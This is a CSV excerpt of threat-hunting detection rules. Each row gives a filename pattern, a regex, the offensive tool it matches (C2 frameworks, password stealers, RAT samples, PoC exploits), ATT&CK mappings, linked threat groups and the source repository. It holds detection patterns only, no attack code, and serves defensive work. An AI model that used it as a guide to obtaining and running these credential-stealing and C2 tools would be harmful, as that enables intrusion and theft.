"*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","7157"
"*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","7158"
"*/extpassword.zip*",".{0,1000}\/extpassword\.zip.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7159"
"*/extract_wifi.exe*",".{0,1000}\/extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","7160"
"*/ExtractBitlockerKeys.git*",".{0,1000}\/ExtractBitlockerKeys\.git.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","7161"
"*/Exymna RAT.exe*",".{0,1000}\/Exymna\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7162"
"*/f5_bigip_tmui_rce.rb*",".{0,1000}\/f5_bigip_tmui_rce\.rb.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","#linux","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","7163"
"*/Fa1c0n35/zabbix-cve-2022-23131*",".{0,1000}\/Fa1c0n35\/zabbix\-cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z","7164"
"*/Fake Error Message RAT.exe*",".{0,1000}\/Fake\sError\sMessage\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7165"
"*/fake.html",".{0,1000}\/fake\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","7166"
"*/FakeCmdLine*",".{0,1000}\/FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","7167"
"*/FakeLogonScreen.exe*",".{0,1000}\/FakeLogonScreen\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7168"
"*/fakelogonscreen.exe*",".{0,1000}\/fakelogonscreen.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7169"
"*/fakelogonscreen.git*",".{0,1000}\/fakelogonscreen\.git.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7170"
"*/fakelogonscreen/releases/download/*",".{0,1000}\/fakelogonscreen\/releases\/download\/.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7171"
"*/fakelogonscreen/tarball/*",".{0,1000}\/fakelogonscreen\/tarball\/.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7172"
"*/fakelogonscreen/zipball/*",".{0,1000}\/fakelogonscreen\/zipball\/.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7173"
"*/fake-sms.git*",".{0,1000}\/fake\-sms\.git.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","7174"
"*/fakewarning.dll*",".{0,1000}\/fakewarning\.dll.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7175"
"*/Farmer.git*",".{0,1000}\/Farmer\.git.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","7176"
"*/fastfuz-chrome-ext*",".{0,1000}\/fastfuz\-chrome\-ext.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Vulnerability Scanner","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","N/A","1","25","5","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z","7177"
"*/FastPathMITM.py*",".{0,1000}\/FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","7178"
"*/fb_firstlast.7z*",".{0,1000}\/fb_firstlast\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","7179"
"*/fb-brute.pl*",".{0,1000}\/fb\-brute\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","7180"
"*/fcrdns.nse*",".{0,1000}\/fcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7181"
"*/febinrev/dirtypipez-exploit*",".{0,1000}\/febinrev\/dirtypipez\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","7182"
"*/Fentanyl.git*",".{0,1000}\/Fentanyl\.git.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","7183"
"*/fern-wifi-cracker/*",".{0,1000}\/fern\-wifi\-cracker\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7184"
"*/Ferrari.ps1*",".{0,1000}\/Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7185"
"*/fetch-some-proxies.git*",".{0,1000}\/fetch\-some\-proxies\.git.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","1","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","7186"
"*/ffuf.git*",".{0,1000}\/ffuf\.git.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","7187"
"*/ffuf/ffufrc*",".{0,1000}\/ffuf\/ffufrc.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","7188"
"*/fgdump.git*",".{0,1000}\/fgdump\.git.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","1","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","7189"
"*/fiesta.profile*",".{0,1000}\/fiesta\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7191"
"*/fiesta2.profile*",".{0,1000}\/fiesta2\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7192"
"*/File Encrypter Reverse Bytes.exe*",".{0,1000}\/File\sEncrypter\sReverse\sBytes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7193"
"*/FileBasic_x64_Release.exe*",".{0,1000}\/FileBasic_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","7194"
"*/FileCrawlerMITM.py*",".{0,1000}\/FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","7195"
"*/FilelessPELoader*",".{0,1000}\/FilelessPELoader.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","7196"
"*/File-Server.ps1*",".{0,1000}\/File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7197"
"*/File-Tunnel.git*",".{0,1000}\/File\-Tunnel\.git.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","1","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","7198"
"*/final_shellcode_size.txt*",".{0,1000}\/final_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","7201"
"*/find_domain.sh*",".{0,1000}\/find_domain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","7202"
"*/find-computer.py*",".{0,1000}\/find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7203"
"*/findDelegation.py*",".{0,1000}\/findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7204"
"*/FindModule.c*",".{0,1000}\/FindModule\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","7205"
"*/FindObjects.cna*",".{0,1000}\/FindObjects\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 